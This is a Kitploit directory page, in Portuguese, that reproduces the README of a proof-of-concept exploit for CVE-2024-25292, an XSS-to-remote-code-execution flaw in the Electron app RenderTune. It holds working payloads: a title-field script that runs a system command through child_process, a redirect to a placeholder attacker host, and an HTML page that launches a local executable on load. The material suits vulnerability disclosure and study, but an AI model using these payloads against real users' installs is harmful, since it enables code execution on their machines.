Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25292 — Exploit de XSS para RCE no RenderTune v1.1.4 | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2024-25292
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

Exploit de XSS para RCE no RenderTune v1.1.4

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RenderTune RCE

Uma prova de conceito para a vulnerabilidade CVE-2024-25292.

Uma vulnerabilidade de cross-site scripting (XSS) no RenderTune v1.1.4 permite que atacantes executem scripts web arbitrários ou HTML por meio de um payload criado injetado no parâmetro Upload Title. Neste repositório há um exemplo de aplicação vulnerável e uma exploração de prova de conceito (POC) dela.

Como PoC, há um arquivo Python que automatiza o processo.

1. Visão Geral da Vulnerabilidade:

É uma vulnerabilidade que permite RCE por meio de XSS. Existe uma parte do título capaz de XSS, portanto é uma vulnerabilidade que permite RCE por meio da sintaxe do NodeJS através da sintaxe do XSS.


2. Causa da Vulnerabilidade:

  • nteract 0.28.0 permite webview do Electron via link Markdown, com execução remota de código resultante (porque nodeIntegration em webPreferences é true).
  • Explicação do exploit
    • Ao gerar links via MarkDown dentro do aplicativo, ele cria um WebView por meio do Electron, permitindo acesso externo ao link. Consequentemente, um atacante pode obter Execução Remota de Código (RCE) ao conectar-se ao link que leva ao servidor do atacante.

Prova de conceito (POC)

Caso 1) XSS para RCE.

Passo 1) Confirme que o XSS ocorre na parte do título ※ Neste momento, o item Upload não será registrado a menos que a imagem esteja anexada.

root@kitploit:~
<b>jruru</b>

1

Passo 2) Portanto, ele é configurado para usar XSS para executar comandos de sistema do NodeJS.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

Caso 2) Ataques por meio de um servidor do atacante

※ Ao tentar um ataque usando window.location, você vai automaticamente para a página que definiu sempre que executa o aplicativo.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

Nota: ※ Se quiser testar rapidamente, crie um servidor no PC do atacante com o seguinte código.

root@kitploit:~
$ python -m http.server 80
  • Código PoC
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


Baixar ferramenta